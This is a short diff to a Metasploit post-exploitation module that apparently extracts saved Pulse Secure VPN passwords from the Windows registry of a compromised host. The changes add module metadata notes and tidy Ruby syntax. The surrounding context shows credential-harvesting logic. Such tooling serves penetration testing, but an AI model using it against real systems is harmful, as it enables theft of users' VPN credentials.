@@ -50,6 +50,11 @@ class MetasploitModule < Msf::Post
               stdapi_sys_process_memory_write
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
         }
       )
     )
@@ -78,7 +83,7 @@ class MetasploitModule < Msf::Post
       #  enumerate all processes to find the one that we're are currently executing as,
       #  and then fetch the architecture attribute of that process by doing ["arch"]
       #  to check if it is an 32bits process or not.
-      if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      if session.sys.process.each_process.find { |i| i['pid'] == pid }['arch'] == 'x86'
         addr = [mem].pack('V')
         len = [data.length].pack('V')
 
@@ -228,7 +233,7 @@ class MetasploitModule < Msf::Post
         next unless key_names
 
         key_names.each do |key_name|
-          ive_index = key_name[4..-1] # remove 'ive:'
+          ive_index = key_name[4..] # remove 'ive:'
           # We get the encrypted password value from registry
           reg_path = "HKEY_USERS\\#{profile['SID']}\\Software\\Pulse Secure\\Pulse\\User Data\\ive:#{ive_index}"
           vals = registry_enumvals(reg_path)
